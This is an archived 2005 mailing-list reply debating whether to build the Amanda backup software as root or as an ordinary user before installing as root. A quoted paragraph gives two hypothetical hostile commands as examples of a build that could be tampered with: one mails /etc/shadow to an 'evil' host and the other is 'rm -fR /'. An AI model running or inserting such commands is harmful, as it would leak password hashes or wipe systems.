Amanda-Users
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Fedora Core 3 - which version of tar??

2005-01-21 23:15:31
Subject: Re: Fedora Core 3 - which version of tar??
From: Gene Heskett <gene.heskett AT verizon DOT net>
To: amanda-users AT amanda DOT org
Date: Fri, 21 Jan 2005 23:09:10 -0500 
On Friday 21 January 2005 19:15, Frank Smith wrote:
>--On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman 
<erics AT telepres DOT com> wrote:
>> On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger 
wrote:
>>> - configure and make as $AMANDAUSER
>>
>> I don't believe this is necessary.  One should avoid building
>> Amanda as root, but that's not because it'll cause problems for
>> Amanda; it's for the same reason one should avoid building
>> *anything* as root.
>
>Sorry for hijacking a thread, but playing devil's advocate here,
>what difference does it really make whether you build as root
>or not if you run 'make install' as root?  How many people
>actually go through each line of the makefile, or run make -n
>first and examine all that, plus look through the code itself?

You will have the wrong permissions all over the place if you build 
amanda as root.  Only the install should be done as root.  This is 
basic security.  Go ahead, build it as root and install it.  I've 
never been able to make it run that way, ever.  There are good 
security reasons for doing it in the sequence we recommend, and the 
clues that this is what happened when someone asks a question are 
like flashing red lights to those of us who have played this game.

>   In Amanda's case, for example, if the source for runtar
>contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
>'rm -fR /' would it really make any difference what user it
>was compiled under?  Would they notice even if it wasn't buried
>in the source, but was just part of the 'install' target in
>the makefile (or an included subdirectory makefile)?
>   For user programs, compiling and installing as a user
>can limit the damage that can be done, but if any part of
>the build, install, or execution ever has root privileges
>then you really aren't increasing  your security by building
>as a normal user and installing as root.
>   All that said, I generally do build as a normal user, as
>it can expose permission problems on libraries, paths, etc.
>at build time instead of later when users are trying to run
>the program.
>
>Frank
>
>> I've never had a problem building Amanda under my own user
>> account, and it's hard to see why such a problem might ever
>> occur.
>>
>>> make install as root
>>
>> This *is* necessary, of course.
>>
>> --
>>
>>|  | /\
>>|
>>| -_|/  >   Eric Siegerman, Toronto, Ont.        erics AT telepres DOT com
>>|
>>|  |  /
>>
>> The animal that coils in a circle is the serpent; that's why so
>> many cults and myths of the serpent exist, because it's hard to
>> represent the return of the sun by the coiling of a hippopotamus.
>>      - Umberto Eco, "Foucault's Pendulum"

-- 
Cheers, Gene
"There are four boxes to be used in defense of liberty:
 soap, ballot, jury, and ammo. Please use in that order."
-Ed Howdershelt (Author)
99.32% setiathome rank, not too shabby for a WV hillbilly
Yahoo.com attorneys please note, additions to this message
by Gene Heskett are:
Copyright 2005 by Maurice Eugene Heskett, all rights reserved.
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Fedora Core 3 - which version of tar??, Gene Heskett
Next by Date:  Problem with amrecover, Sören Edzen
Previous by Thread:  Re: Fedora Core 3 - which version of tar??, Jon LaBadie
Next by Thread:  Re: Fedora Core 3 - which version of tar??, Gene Heskett
Indexes:  [Date] [Thread] [Top] [All Lists]